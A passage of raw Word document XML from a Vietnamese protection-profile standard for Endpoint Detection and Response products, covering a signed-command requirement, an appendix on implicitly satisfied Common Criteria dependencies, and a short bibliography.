      </w:r>
    </w:p>
    <w:p w14:paraId="155B9149" w14:textId="4CEB4294" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00893DC3" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kiểm toán</w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>: FMT_TRM_EXT.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E16C31" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Không có sự kiện có thể kiểm toán dự kiến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0700895E" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FMT_TRM_EXT.1 Chức năng khắc phục đáng tin cậy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA28E7A" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Phân cấp thành: Không có thành phần nào khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0940A20F" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Phụ thuộc vào: Không phụ thuộc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F95D4B9" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FMT_TRM_EXT.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAE1980" w14:textId="61DF005E" w:rsidR="00893DC3" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>EDR, Nền tảng EDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>] phải ký điện tử các lệnh và chính sách được gửi đến Tác nhân máy chủ bằng chữ ký [</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>RSA, ECDSA</w:t>
      </w:r>
      <w:r w:rsidR="00652C86" w:rsidRPr="00204C5F">
        <w:t>] đáp ứng FIPS PUB 186-4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431DF455" w14:textId="77777777" w:rsidR="00652C86" w:rsidRPr="00204C5F" w:rsidRDefault="00652C86" w:rsidP="00BD2F41">
      <w:pPr>
        <w:sectPr w:rsidR="00652C86" w:rsidRPr="00204C5F" w:rsidSect="006D5C6B">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="680" w:bottom="1134" w:left="1134" w:header="633" w:footer="723" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE4D003" w14:textId="769206EF" w:rsidR="001715EB" w:rsidRPr="00204C5F" w:rsidRDefault="00893DC3" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc137476366"/>
      <w:r w:rsidRPr="00204C5F">
        <w:lastRenderedPageBreak/>
        <w:t>Phụ lục E</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="60DD043D" w14:textId="77777777" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="005873FB" w:rsidP="005873FB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Quy định)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC29C3A" w14:textId="704046B0" w:rsidR="00552BD6" w:rsidRPr="00204C5F" w:rsidRDefault="001715EB" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc137476367"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các yêu cầu đáp ứng hoàn toàn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="38305AB9" w14:textId="0996B2C8" w:rsidR="00652C86" w:rsidRPr="00204C5F" w:rsidRDefault="00652C86" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Phụ lục này liệt kê các yêu cầu mà các sản phẩm được đánh giá thành công dựa trên Hồ sơ bảo vệ này sẽ được coi là đáp ứng. Tuy nhiên, những yêu cầu này không được mô tả rõ ràng dưới dạng SFR và không được đưa vào ST. Chúng không được đưa vào như các SFR độc lập vì nó sẽ làm tăng thời gian, chi phí và độ phức tạp của việc đánh giá. Cách tiếp cận này được </w:t>
      </w:r>
      <w:r w:rsidR="00EA77DD" w:rsidRPr="00204C5F">
        <w:t>chấp nhận</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> bởi [CC] Phần 1, 8.2 Sự phụ thuộc giữa các thành phần.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32153E61" w14:textId="3A200662" w:rsidR="00652C86" w:rsidRPr="00204C5F" w:rsidRDefault="00652C86" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Thông tin này mang lại lợi ích cho các hoạt động kỹ thuật hệ thống yêu cầu đưa vào các biện pháp kiểm soát </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> cụ thể. Đánh giá dựa trên Hồ sơ bảo vệ cung cấp bằng chứng cho thấy các biện pháp kiểm soát này hiện có và đã được đánh giá.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6738"/>
      </w:tblGrid>
      <w:tr w:rsidR="00652C86" w:rsidRPr="00204C5F" w14:paraId="41E512CA" w14:textId="77777777" w:rsidTr="00652C86">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7406DA8A" w14:textId="77777777" w:rsidR="00652C86" w:rsidRPr="00204C5F" w:rsidRDefault="00652C86" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
                <w:lang w:val="vi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Yêu cầu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6804" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45FACF07" w14:textId="77777777" w:rsidR="00652C86" w:rsidRPr="00204C5F" w:rsidRDefault="00652C86" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Tính nhất quán để đáp ứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00652C86" w:rsidRPr="00204C5F" w14:paraId="7D05B8AB" w14:textId="77777777" w:rsidTr="00652C86">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C0EA1A8" w14:textId="0550BC4C" w:rsidR="00652C86" w:rsidRPr="00204C5F" w:rsidRDefault="00652C86" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">FIA_UID.1 - Thời gian </w:t>
            </w:r>
            <w:r w:rsidR="00475C38" w:rsidRPr="00204C5F">
              <w:t>định danh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6804" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="285C6E71" w14:textId="2B64F21F" w:rsidR="00652C86" w:rsidRPr="00204C5F" w:rsidRDefault="00652C86" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">CC Phần 2 chỉ định FIA_UID.1 là phần phụ thuộc của FMT_SMR.1 vì TSF phải có một số cách xác định người dùng để họ có thể được liên kết với các vai trò quản lý. Sự phụ thuộc này được giải quyết hoàn toàn thông qua FIA_AUT_EXT.1, chỉ định một phương pháp </w:t>
            </w:r>
            <w:r w:rsidR="00475C38" w:rsidRPr="00204C5F">
              <w:t>định danh</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> người dùng thay thế.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00652C86" w:rsidRPr="00204C5F" w14:paraId="389CF518" w14:textId="77777777" w:rsidTr="00652C86">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F8A6D3B" w14:textId="77777777" w:rsidR="00652C86" w:rsidRPr="00204C5F" w:rsidRDefault="00652C86" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t>FPT_STM.1 - Dấu thời gian tin cậy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6804" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C8D6D0A" w14:textId="77777777" w:rsidR="00652C86" w:rsidRPr="00204C5F" w:rsidRDefault="00652C86" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="vi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t>CC Phần 2 chỉ định FPT_STM.1 là phần phụ thuộc của FAU_GEN.1 vì các bản ghi kiểm tra yêu cầu dấu thời gian đáng tin cậy để đáp ứng FAU_GEN.1.2. Sự phụ thuộc này được giải quyết hoàn toàn thông qua giả định A.PLATFORM của Hồ sơ cơ sở vì "nền tảng điện toán đáng tin cậy" được giả định là bao gồm đồng hồ hệ thống đáng tin cậy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B8B7A13" w14:textId="77777777" w:rsidR="00893DC3" w:rsidRPr="00204C5F" w:rsidRDefault="00893DC3" w:rsidP="00BD2F41"/>
    <w:p w14:paraId="325E7774" w14:textId="77777777" w:rsidR="00D87411" w:rsidRPr="00204C5F" w:rsidRDefault="00D87411" w:rsidP="00BD2F41"/>
    <w:p w14:paraId="01B56EF5" w14:textId="77777777" w:rsidR="00D87411" w:rsidRPr="00204C5F" w:rsidRDefault="00D87411" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC36024" w14:textId="77777777" w:rsidR="00344D73" w:rsidRPr="00204C5F" w:rsidRDefault="00344D73" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc137476368"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hư mục t</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ài liệu tham khảo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="1DB5E885" w14:textId="1758075E" w:rsidR="00204C5F" w:rsidRDefault="00204C5F" w:rsidP="00204C5F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PP-Module for Endpoint Detection and Response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (EDR)</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Version: 1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2020-10-23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>National Information Assurance Partnership</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244C182D" w14:textId="4005F761" w:rsidR="00344D73" w:rsidRDefault="00204C5F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">TCVN 8709-1:2011 - Công nghệ thông tin. Các kỹ thuật an toàn. Các </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">tiêu chí đánh giá an toàn CNTT. </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Phần 1: Giới thiệu và mô hình tổng quát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E2FD86" w14:textId="04FD7FD9" w:rsidR="00204C5F" w:rsidRDefault="00204C5F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCVN 13468:2022 Công nghệ thông tin – Các kỹ thuật an toàn – Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572B3E04" w14:textId="6C5A03F4" w:rsidR="00204C5F" w:rsidRDefault="00204C5F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54568BD2" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRPr="00204C5F" w:rsidRDefault="00204C5F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16483AAF" w14:textId="7B560205" w:rsidR="00B1283F" w:rsidRDefault="00894438" w:rsidP="00BD2F41">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251652096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4DC63F17" wp14:editId="4A3426D6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2286030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>165735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1943100" cy="635"/>
                <wp:effectExtent l="19050" t="19050" r="38100" b="3746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63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9F9BA85" id="Straight Connector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05pt" to="33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" strokeweight=".26mm">
                <v:stroke joinstyle="miter" endcap="square"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B1283F" w:rsidSect="006D5C6B">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="680" w:bottom="1134" w:left="1134" w:header="633" w:footer="7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5CBDC" w14:textId="77777777" w:rsidR="00683525" w:rsidRDefault="00683525">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="233DD7D0" w14:textId="77777777" w:rsidR="00683525" w:rsidRDefault="0068352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ont495">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Liberation Mono">
    <w:altName w:val="Courier New"/>
    <w:charset w:val="01"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Malgun Gothic">
    <w:panose1 w:val="020B0503020000020004"/>
    <w:charset w:val="81"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="9000002F" w:usb1="29D77CFB" w:usb2="00000012" w:usb3="00000000" w:csb0="00080001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Noto Sans CJK SC Regular">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5FDE9" w14:textId="2BC0175A" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="0045078F">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412EE" w14:textId="237D700F" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="0045078F">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>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76A58" w14:textId="51D850E7" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008604DD">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>5</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="36D79F37" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5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7A057" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="42BEF848" w14:textId="6E670ED6" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008604DD">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>4</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2770" w14:textId="26C2F7C1" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008604DD">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>20</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AC922" w14:textId="7C8435AD" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008604DD">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>21</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="713300B4" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5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61674" w14:textId="0BC0137C" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008604DD">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>6</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="79684AAF" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204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57499" w14:textId="6301E9EA" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>3</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="7A26E1D4" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204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2ED2" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="14BDDA80" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C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4857A" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5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A7832" w14:textId="726F9412" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="0045078F">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18633" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5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D8C98" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5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2E51F" w14:textId="638438BC" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008604DD">
      <w:rPr>
        <w:noProof/>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2D92E" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C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B8E86" w14:textId="77777777" w:rsidR="00683525" w:rsidRDefault="00683525">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3C31CEC7" w14:textId="77777777" w:rsidR="00683525" w:rsidRDefault="0068352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066C" w14:textId="5D7611C2" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:spacing w:before="0" w:after="227"/>
      <w:ind w:right="170"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
